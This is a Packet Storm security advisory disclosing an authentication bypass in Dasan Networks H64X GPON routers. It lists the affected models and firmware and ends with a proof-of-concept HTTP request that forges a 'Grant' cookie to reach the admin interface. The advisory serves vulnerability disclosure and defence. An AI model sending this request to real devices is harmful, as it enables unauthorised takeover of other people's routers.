Dasan Networks GPON ONT WiFi Router H64X Series Authentication Bypass

2017-07-13T00:00:00
ID PACKETSTORM:143352
Type packetstorm
Reporter LiquidWorm
Modified 2017-07-13T00:00:00

Description

                                        
                                            `  
Dasan Networks GPON ONT WiFi Router H64X Series Authentication Bypass  
  
  
Vendor: Dasan Networks  
Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu  
Affected version: Model: H640GR-02  
H640GV-03  
H640GW-02  
H640RW-02  
H645G  
Firmware: 2.76-9999  
2.76-1101  
2.67-1070  
2.45-1045  
  
Summary: H64xx is comprised of one G-PON uplink port and four ports  
of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It  
helps service providers to extend their core optical network all the  
way to their subscribers, eliminating bandwidth bottlenecks in the  
last mile. H64xx is integrated device that provide the high quality  
Internet, telephony service (VoIP) and IPTV or OTT content for home  
or office. H64xx enable the subscribers to make a phone call whose  
quality is equal to PSTN at competitive price, and enjoy the high  
quality resolution live video and service such as VoD or High Speed  
Internet.  
  
Desc: The vulnerable device does not properly perform authentication  
and authorization, allowing it to be bypassed through cookie manipulation.  
Setting the Cookie 'Grant' with value 1 (user) or 2 (admin) will  
bypass security controls in place enabling the attacker to take full  
control of the device management interface.  
  
Tested on: Server: lighttpd/1.4.31  
Server: DasanNetwork Solution  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2017-5421  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5421.php  
  
  
19.05.2017  
  
--  
  
  
GET /cgi-bin/sysinfo.cgi HTTP/1.1  
Host: 192.168.0.1:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Bond-James-Bond/007  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,mk;q=0.6  
Cookie: Grant=1; Language=english; silverheader=3c  
Connection: close  
`